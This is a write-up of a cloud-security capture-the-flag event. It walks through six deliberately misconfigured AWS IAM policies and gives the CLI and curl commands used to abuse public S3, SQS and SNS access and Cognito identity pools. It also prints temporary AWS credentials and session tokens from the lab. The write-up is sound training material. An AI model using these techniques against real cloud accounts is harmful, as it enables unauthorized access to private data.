Recently I came across The Big IAM Challenge. It is a cloud security Capture The Flag (CTF) event. The challenge consists of 6 steps, with each one focusing on a common IAM configuration mistake in various AWS services.
I thought I’ll do a write-up for this CTF challenge. I encourage you’ll to give this a solid try and only use this guide if you’re stuck at a particular level.
Challenge 1: Buckets of Fun
We all know that public buckets are risky. But can you find the flag?
IAM Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
"Condition": {
"StringLike": {
"s3:prefix": "files/*"
}
}
}
]
}
The IAM policy allows anyone to download an object and anyone to list an object from bucket s3://thebigiamchallenge-storage-9979f4b/files/
.
Let us first list the objects and see if we can get the flag.
> aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
2023-06-05 19:13:53 37 flag1.txt
2023-06-08 19:18:24 81889 logo.png
> aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
{wiz:exposed-storage-risky-as-usual}
Flag: {wiz:exposed-storage-risky-as-usual}
Challenge 2: Google Analytics
We created our own analytics system specifically for this challenge. We think it’s so good that we even used it on this page. What could go wrong? Join our queue and get the secret flag.
IAM Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": [
"sqs:SendMessage",
"sqs:ReceiveMessage"
],
"Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
}
]
}
The IAM policy allows anyone to send and receive SQS messages from `wiz-tbic-analytics-sqs-queue-ca7a1b2``. Let us check if we can receive any message from SQS by forming a queue URL and exploring the message received.
> aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2
{
"Messages": [
{
"MessageId": "44c1cf94-51ca-4f62-9901-a62974d3a40c",
"ReceiptHandle": "AQEBDD9PTJro+N0m5CTew9NrGyFZgRGL0h1ljFRw9VJKvXhDE/yHwHHAStHXZA5MVRw6Jd2KxJAtdnmkmSQaJvalRIoJtQSsd1zqT+d2rudemniJ1ONJ2ATi
EOwYmoacGipi8UXKIdixGDkl12krM9TTQy0d4h9s2xETMKJXXMN88g1rlhZs2XN8iRwSZuJ4I+iqnNVAc0eKT5PozBeR95hTZaspyUQx7jtWIgKYyy3Faqsw7dbbcHyrcZFKzFS7iGIS1RyQ9yHd7J
cUZ8ApASULnvF1sDDdAP7ymjbYaXxOIpKnBKq2D1AU4yscXNEfKbBNqGDR5rd7XwyGr9ry9lit6FIry6YaI7bwGG162mlEx4t2lAqnOS9bOt3XPLjpBN4czG7upT3VZGDr63rPSKTWA6r4WbgCe6CA
vBAl2Qywxo8=",
"MD5OfBody": "4cb94e2bb71dbd5de6372f7eaea5c3fd",
"Body": "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent\": \"Lynx/2.5329.3258dev.3
5046 libwww-FM/2.14 SSL-MM/1.4.3714\", \"IsAdmin\": true}"
}
]
}
> curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
{wiz:you-are-at-the-front-of-the-queue}
Flag: {wiz:you-are-at-the-front-of-the-queue}
Challenge 3: Enable Push Notifications
We got a message for you. Can you get it?
IAM Policy
{
"Version": "2008-10-17",
"Id": "Statement1",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Condition": {
"StringLike": {
"sns:Endpoint": "*@tbic.wiz.io"
}
}
}
]
}
This IAM policy allows anyone to subscribe to SNS TBICWizPushNotifications
topic with the condition that the endpoint should end with @tbic.wiz.io
.
Now if you don’t have an email account ending with that domain, then you’ll have to use another protocol to subscribe to it.
I will use HTTPS protocol along with this tool https://webhook.site/ to subscribe and receive notifications to this webhook. Get yourself a unique URL here.
Make sure to append /@tbic.wiz.io
at the end of your unique URL. For example https://webhook.site/random-string/@tbic.wiz.io
.
> aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint https://webhook.site/random-string/@tbic.wiz.io
{
"SubscriptionArn": "pending confirmation"
}
Now you should receive a subscription confirmation message in the webhook dashboard. To confirm the subscription, visit the SubscribeURL included in the message.
Once you confirm the subscription, you will continue to receive notifications with a message. This message is the flag.
Flag: {wiz:always-suspect-asterisks}
Challenge 4: Admin only?
We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?
IAM Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
"Condition": {
"StringLike": {
"s3:prefix": "files/*"
},
"ForAllValues:StringLike": {
"aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
}
}
}
]
}
This IAM policy allows anyone to download objects from bucket thebigiamchallenge-admin-storage-abf1321
and anyone can list the objects with the condition that the prefix should be files
and user ARN as arn:aws:iam::133713371337:user/admin
.
So let us craft an S3 URL and list the files using the browser or cURL.
Then we can view the flag after listing.
> curl "https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321?prefix=files/"
<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Name>thebigiamchallenge-admin-storage-abf1321</Name><Prefix>files/</Prefix><Marker>
</Marker><MaxKeys>1000</MaxKeys><IsTruncated>false</IsTruncated><Contents><Key>files/flag-as-admin.txt</Key><LastModified>2023-06-07T19:15:43.000Z</La
stModified><ETag>"e365cfa7365164c05d7a9c209c4d8514"</ETag><Size>42</Size><StorageClass>STANDARD</StorageClass></Contents><Contents><Key>files/logo-adm
in.png</Key><LastModified>2023-06-08T19:20:01.000Z</LastModified><ETag>"c57e95e6d6c138818bf38daac6216356"</ETag><Size>81889</Size><StorageClass>STANDA
RD</StorageClass></Contents></ListBucketResult>
> curl "https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt"
{wiz:principal-arn-is-not-what-you-think}
Flag: {wiz:principal-arn-is-not-what-you-think}
Challenge 5: Do I know you?
We configured AWS Cognito as our main identity provider. Let’s hope we didn’t make any mistakes.
IAM Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"mobileanalytics:PutEvents",
"cognito-sync:*"
],
"Resource": "*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Resource": [
"arn:aws:s3:::wiz-privatefiles",
"arn:aws:s3:::wiz-privatefiles/*"
]
}
]
}
This IAM policy allows the application to send event data and allows all actions within the Cognito Sync service. It also allows to download and list objects from bucket wiz-privatefiles
.
From the policy we know they are using the cognito service so let us try to find the identity pool ID. We can find it in the source code of https://thebigiamchallenge.com/challenge/5.
Using identity pool ID, let’s get the temporary credentials to pretend we are making calls from that application.
I am using Windows cmd to put the temporary credentials into environment variables.
With that, I will list the objects and get the flag.
C:\>aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
{
"IdentityId": "us-east-1:f5a72c75-855a-474b-b2a7-66e81fa7f946"
}
C:\>aws cognito-identity get-credentials-for-identity --identity-id us-east-1:f5a72c75-855a-474b-b2a7-66e81fa7f946
{
"IdentityId": "us-east-1:f5a72c75-855a-474b-b2a7-66e81fa7f946",
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXAMI7QU4W",
"SecretKey": "DHbLG1eNTOPj0fiB2dZ5NuWSxXb0FigBrNnIxZr4",
"SessionToken": "IQoJb3JpZ2luX2VjEOT//////////wEaCXVzLWVhc3QtMSJHMEUCIQDlh16iHsKaNP3juYvizDpfX1h3ryfBhEiRsexKRAdDvwIgRBNnEnBf2LByNm43cVgIopWnbAd8xFdDDUE6+lfjYdgqhwYIPRAAGgwwOTIyOTc4NTEzNzQiDFNb9tpd+irGhm5SmCrkBfXWprhVUrnp8+r7Su2hQzXnpK2PE2doivZ5p1OpljmpV1EAga2whq+s3KldFC/Iiq1p8o179VhwjStirJ2a3qiMG3EHFpuLyVvoYLnWUt6GYKaUREPf6iLN6Ga8lWfxEgFx1K7zr9brFls+LVRPhSF8ZBufeqGlIgnODpg1rRUJLms3Vf4x0/B8AdEmkVZZzApgnDWPyVBqBQmQbJEPty9BhVVqA+NNpHj5rSLmCVqzVtirZ1oDBk57GDlLGeJvQ3t9kV5kEbqGiX57NtMOmEtEZV3ePQMjpK9xPAcPQBBXGE6r8LuxPB9mz+ipSWZdMDI6RM2rCGhiCEC+RauXXMVB/gq9351UDbtaGGddNx2ckStCSsrAPPKjAcEqE4K8avdpVaW07uak48p7HfCd5wLZTR0NC1KFyXdpA6Mh8/FKYVm9Xdv1/afMtqXbfKrvdzy1xcskpQ+E7zNfBZQg11fgGzSQN/OeOhjwoRhyFQq7TX1fJSKgUdceJJywIxGc60mMUcl2nCeFqIebbN+t3LWbq89Zq3uMzDpAQqwDguOXf2/nLYfRT/lDztVV+dbEsLz0PXQfVDPGE7zRLCrWKTfyKjvmTnd2fFH6i2z9fndVLGWCdWuY1vSqwn0lpKTOra9adzzq8mVRv9PmL22ak5zVbTJxjG86NlOTZo/hnSGo4x2mt982QPOL3nR1v4uoq/l2wQPW4w/EV2wfUKUTwC6t2vvg+BKG+JrXx6jDWqF7tvns/A7Yt5I3B98RDprXVgHSecZBqzsdJZG8vXawUwZDtQXKmQAC4Pho1k7l26FGgbAGnewlP6460renbpwZE4TcKcLc9EvFsoTioI7diBnFH3lZSZQ3abHALQxIwVEXcbI0nRraPCL7i1EXEhr/3/iIwydZ3juHXsapHYV0zGGpox/iIdky1sQrsTZuSGdvIYmI/p6RFaUYyBFrGTwBT6IP2cELY4GjwzHjzMbtox3Bz8z8MNK7r6QGOocCSePseRkNkcwqx/K52OSiDFwsUZxbomhS8TfeFetOf4ArQKInX2/eU+Bv5G3x8Q0D2vXYBLAG8z91PMTFcsjZSRf+XhvLVZwaScu/B16DuOTwlnfp5sDHz9G5/UoHsWGk63SlVHr5jZ2jGdhHdDjd0jmATgouXG0F77S40Ci9nQ/snmE4t8Priarzm4obup+n6dFRXBAo+f9mCXKnhkvzSMgIAO2UYjK4MFEtNadvUKGz/Hn4ZDgyMAtnuo5U/zX+rSFrF+IwyFVm00g2tvblG6qdhunOUoB+HZhzZhZU5wVpNcLrpI4NJpnffAXVAbqNOiNFK0GazRXxaATNyJqVMTciS6ghR1A=",
"Expiration": "2023-06-16T00:58:10-04:00"
}
}
C:\>set AWS_ACCESS_KEY_ID=ASIARK7LBOHXAMI7QU4W
C:\>set AWS_SECRET_ACCESS_KEY=DHbLG1eNTOPj0fiB2dZ5NuWSxXb0FigBrNnIxZr4
C:\>set AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEOT//////////wEaCXVzLWVhc3QtMSJHMEUCIQDlh16iHsKaNP3juYvizDpfX1h3ryfBhEiRsexKRAdDvwIgRBNnEnBf2LByNm43cVgIopWnbAd8xFdDDUE6+lfjYdgqhwYIPRAAGgwwOTIyOTc4NTEzNzQiDFNb9tpd+irGhm5SmCrkBfXWprhVUrnp8+r7Su2hQzXnpK2PE2doivZ5p1OpljmpV1EAga2whq+s3KldFC/Iiq1p8o179VhwjStirJ2a3qiMG3EHFpuLyVvoYLnWUt6GYKaUREPf6iLN6Ga8lWfxEgFx1K7zr9brFls+LVRPhSF8ZBufeqGlIgnODpg1rRUJLms3Vf4x0/B8AdEmkVZZzApgnDWPyVBqBQmQbJEPty9BhVVqA+NNpHj5rSLmCVqzVtirZ1oDBk57GDlLGeJvQ3t9kV5kEbqGiX57NtMOmEtEZV3ePQMjpK9xPAcPQBBXGE6r8LuxPB9mz+ipSWZdMDI6RM2rCGhiCEC+RauXXMVB/gq9351UDbtaGGddNx2ckStCSsrAPPKjAcEqE4K8avdpVaW07uak48p7HfCd5wLZTR0NC1KFyXdpA6Mh8/FKYVm9Xdv1/afMtqXbfKrvdzy1xcskpQ+E7zNfBZQg11fgGzSQN/OeOhjwoRhyFQq7TX1fJSKgUdceJJywIxGc60mMUcl2nCeFqIebbN+t3LWbq89Zq3uMzDpAQqwDguOXf2/nLYfRT/lDztVV+dbEsLz0PXQfVDPGE7zRLCrWKTfyKjvmTnd2fFH6i2z9fndVLGWCdWuY1vSqwn0lpKTOra9adzzq8mVRv9PmL22ak5zVbTJxjG86NlOTZo/hnSGo4x2mt982QPOL3nR1v4uoq/l2wQPW4w/EV2wfUKUTwC6t2vvg+BKG+JrXx6jDWqF7tvns/A7Yt5I3B98RDprXVgHSecZBqzsdJZG8vXawUwZDtQXKmQAC4Pho1k7l26FGgbAGnewlP6460renbpwZE4TcKcLc9EvFsoTioI7diBnFH3lZSZQ3abHALQxIwVEXcbI0nRraPCL7i1EXEhr/3/iIwydZ3juHXsapHYV0zGGpox/iIdky1sQrsTZuSGdvIYmI/p6RFaUYyBFrGTwBT6IP2cELY4GjwzHjzMbtox3Bz8z8MNK7r6QGOocCSePseRkNkcwqx/K52OSiDFwsUZxbomhS8TfeFetOf4ArQKInX2/eU+Bv5G3x8Q0D2vXYBLAG8z91PMTFcsjZSRf+XhvLVZwaScu/B16DuOTwlnfp5sDHz9G5/UoHsWGk63SlVHr5jZ2jGdhHdDjd0jmATgouXG0F77S40Ci9nQ/snmE4t8Priarzm4obup+n6dFRXBAo+f9mCXKnhkvzSMgIAO2UYjK4MFEtNadvUKGz/Hn4ZDgyMAtnuo5U/zX+rSFrF+IwyFVm00g2tvblG6qdhunOUoB+HZhzZhZU5wVpNcLrpI4NJpnffAXVAbqNOiNFK0GazRXxaATNyJqVMTciS6ghR1A=
C:\>set AWS_DEFAULT_REGION=us-east-1
C:\Users\AshwinA>aws sts get-caller-identity
{
"UserId": "AROARK7LBOHXJKAIRDRIU:CognitoIdentityCredentials",
"Account": "092297851374",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessUnauth_Role/CognitoIdentityCredentials"
}
C:\>aws s3 ls s3://wiz-privatefiles
2023-06-05 15:42:27 4220 cognito1.png
2023-06-05 09:28:35 37 flag1.txt
C:\>aws s3 cp s3://wiz-privatefiles/flag1.txt -
{wiz:incognito-is-always-suspicious}
Flag: {wiz:incognito-is-always-suspicious}
Challenge 6: One final push
Anonymous access no more. Let’s see what can you do now. Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role
IAM Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "cognito-identity.amazonaws.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
}
}
]
}
This IAM policy allows identity us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
to assume role.
First let’s get IdentityId using identity pool ID.
Then get an open ID token.
We’ll use open ID token to assume the role arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role
and we got the user CognitoIdentityCredentials
from challenge 5.
Then we’ll list the objects and look for the flag.
C:\>aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
{
"IdentityId": "us-east-1:2068eb33-57fa-49fb-8136-0d50abf3d38a"
}
C:\>aws cognito-identity get-open-id-token --identity-id us-east-1:2068eb33-57fa-49fb-8136-0d50abf3d38a
{
"IdentityId": "us-east-1:2068eb33-57fa-49fb-8136-0d50abf3d38a",
"Token": "eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MjA2OGViMzMtNTdmYS00OWZiLTgxMzYtMGQ1MGFiZjNkMzhhIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE2ODY4ODk5ODEsImlhdCI6MTY4Njg4OTM4MX0.IXUj21kas-qVQh-6wVAKKOjRdNbLKAhM7x790on4MHny-CV5fQP8D87uTtlzGIgXd5alH7fWzOWBD3_MmNsH2FGs1vV1ZkivI62VWGnP3hOPIUgl07YBn6JVmGF0MQa7JCeq2m0eFA7RhAVA6xnSvKlQcyhl5b2bouKh-LH10voNx442ctrhFNj5e4Qa34czlFTI8zOcBjkIQ6uZUjaEneXNDxkn6WAJFXC_yVpEPeSa1RsxPFJzdUT9KV7PZP0hgVmxgy7mgY8GUpv0ehhWStmfQOBCvnrLAyhxFWzlfPbiNKpeqemo-d8T_WJm70zEFJTODx0o0mwSV60OpY3UWw"
}
C:\>aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name CognitoIdentityCredentials --web-identity-token eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MjA2OGViMzMtNTdmYS00OWZiLTgxMzYtMGQ1MGFiZjNkMzhhIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE2ODY4ODk5ODEsImlhdCI6MTY4Njg4OTM4MX0.IXUj21kas-qVQh-6wVAKKOjRdNbLKAhM7x790on4MHny-CV5fQP8D87uTtlzGIgXd5alH7fWzOWBD3_MmNsH2FGs1vV1ZkivI62VWGnP3hOPIUgl07YBn6JVmGF0MQa7JCeq2m0eFA7RhAVA6xnSvKlQcyhl5b2bouKh-LH10voNx442ctrhFNj5e4Qa34czlFTI8zOcBjkIQ6uZUjaEneXNDxkn6WAJFXC_yVpEPeSa1RsxPFJzdUT9KV7PZP0hgVmxgy7mgY8GUpv0ehhWStmfQOBCvnrLAyhxFWzlfPbiNKpeqemo-d8T_WJm70zEFJTODx0o0mwSV60OpY3UWw
{
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXNRSG3DHL",
"SecretAccessKey": "93hmiWXwFVjWxW4TWBAolgiWvWDjVEnVv+VUaRH7",
"SessionToken": "IQoJb3JpZ2luX2VjEOX//////////wEaCXVzLWVhc3QtMSJIMEYCIQC6gZZiqRUM7ppdEPiYwRhxf//TmQ+2NSnoQxbQVQRqTAIhALbi27tTTH8AWStzFvU0hhZARqFAVYPcogebc8OUpuh7KpsDCD4QABoMMDkyMjk3ODUxMzc0Igw+uDQIAxjEovo/AW8q+ALk7nbipjCZAUangUfNBboy3te84Q+G6XsPMkv/mkedoYvhX4TZUkx8T/iSnxuOTpbw9yaStckZoXMer/w3lKdwgVeqtvOeqz1H/mFKSIoNe+iuDm1kFrpfLIGgBr0+02qHob9QQc7k5WtS80C6VQ5H/FZh685/morgSJeYmCI/bKcb/If5MyRV0PPV5WJb8PXGhS00nsBrHgSW0Ke9hre9MKHbiML1hM9z48fAUuJ42g8lVEWvkJMUlHI1rXz0mlm4jIyEsriVBC9B992YLwwRIg6V5sUNDipcly3LYpoeZ/ub7ddzYyKcGaUimO2JRYiw8Y1YBTxDz0KMdmcliAtOWnKoAkna7S6inO/6GdNvIzLc+dpcDYVK6OSLRY9brDbU3HFgYXTrSpzS6ujc2VsrUAv7cKi54htQZpq94oBu8YJKZn8vK6GbDyub9srfe2E9QhU79SDNhwn2gtDtjnc8Dr0grK4czdqj05MMvjBLLbzcffVY18CkMJnIr6QGOoYC5tXfgaGTLb5xBWYLwmUe82yjZso6LWM9Lg9A+PJGXll4ZQq1WHn/CNlEGJwow0SOk/kNXFtXAkk6Et4cWyLsRPVLce6GxmHfRmq2MXHlTlweUWoGFBA3uj3ahzH7xGxIwFO6VmspxFMIMa7kHvL3ULMzYm8g/rglJDu5C3s4C1wbDjm302wF0Oex40upZ5Lx3/IrZ6XBxqICs7yAelUG1Hx8PtpKZmne2ATSPtBXwrgyVm8KqPRvjjK1xGbkoULF1wz6Hlxa1hSCv3yJIrlVZ9oQt5wfOLEKtcbhFgLliGqMM7ef/zztuaDmqtglz29rlUQBvP5SVuj75acYOpk6zFa/bX8yVA==",
"Expiration": "2023-06-16T05:24:57+00:00"
},
"SubjectFromWebIdentityToken": "us-east-1:2068eb33-57fa-49fb-8136-0d50abf3d38a",
"AssumedRoleUser": {
"AssumedRoleId": "AROARK7LBOHXASFTNOIZG:CognitoIdentityCredentials",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/CognitoIdentityCredentials"
},
"Provider": "cognito-identity.amazonaws.com",
"Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
C:\>set AWS_ACCESS_KEY_ID=ASIARK7LBOHXNRSG3DHL
C:\>set AWS_SECRET_ACCESS_KEY=93hmiWXwFVjWxW4TWBAolgiWvWDjVEnVv+VUaRH7
C:\>set AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEOX//////////wEaCXVzLWVhc3QtMSJIMEYCIQC6gZZiqRUM7ppdEPiYwRhxf//TmQ+2NSnoQxbQVQRqTAIhALbi27tTTH8AWStzFvU0hhZARqFAVYPcogebc8OUpuh7KpsDCD4QABoMMDkyMjk3ODUxMzc0Igw+uDQIAxjEovo/AW8q+ALk7nbipjCZAUangUfNBboy3te84Q+G6XsPMkv/mkedoYvhX4TZUkx8T/iSnxuOTpbw9yaStckZoXMer/w3lKdwgVeqtvOeqz1H/mFKSIoNe+iuDm1kFrpfLIGgBr0+02qHob9QQc7k5WtS80C6VQ5H/FZh685/morgSJeYmCI/bKcb/If5MyRV0PPV5WJb8PXGhS00nsBrHgSW0Ke9hre9MKHbiML1hM9z48fAUuJ42g8lVEWvkJMUlHI1rXz0mlm4jIyEsriVBC9B992YLwwRIg6V5sUNDipcly3LYpoeZ/ub7ddzYyKcGaUimO2JRYiw8Y1YBTxDz0KMdmcliAtOWnKoAkna7S6inO/6GdNvIzLc+dpcDYVK6OSLRY9brDbU3HFgYXTrSpzS6ujc2VsrUAv7cKi54htQZpq94oBu8YJKZn8vK6GbDyub9srfe2E9QhU79SDNhwn2gtDtjnc8Dr0grK4czdqj05MMvjBLLbzcffVY18CkMJnIr6QGOoYC5tXfgaGTLb5xBWYLwmUe82yjZso6LWM9Lg9A+PJGXll4ZQq1WHn/CNlEGJwow0SOk/kNXFtXAkk6Et4cWyLsRPVLce6GxmHfRmq2MXHlTlweUWoGFBA3uj3ahzH7xGxIwFO6VmspxFMIMa7kHvL3ULMzYm8g/rglJDu5C3s4C1wbDjm302wF0Oex40upZ5Lx3/IrZ6XBxqICs7yAelUG1Hx8PtpKZmne2ATSPtBXwrgyVm8KqPRvjjK1xGbkoULF1wz6Hlxa1hSCv3yJIrlVZ9oQt5wfOLEKtcbhFgLliGqMM7ef/zztuaDmqtglz29rlUQBvP5SVuj75acYOpk6zFa/bX8yVA==
C:\>set AWS_DEFAULT_REGION=us-east-1
C:\>aws s3 ls
2023-06-04 13:07:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 09:07:44 thebigiamchallenge-admin-storage-abf1321
2023-06-04 12:31:02 thebigiamchallenge-storage-9979f4b
2023-06-05 09:28:31 wiz-privatefiles
2023-06-05 09:28:31 wiz-privatefiles-x1000
C:\>aws s3 ls s3://wiz-privatefiles-x1000
2023-06-05 15:42:27 4220 cognito2.png
2023-06-05 09:28:35 40 flag2.txt
C:\>aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt -
{wiz:open-sesame-or-shell-i-say-openid}
Flag: {wiz:open-sesame-or-shell-i-say-openid}
I hope you enjoyed this challenge. View my My ceritifcate for the Big Iam Challenge.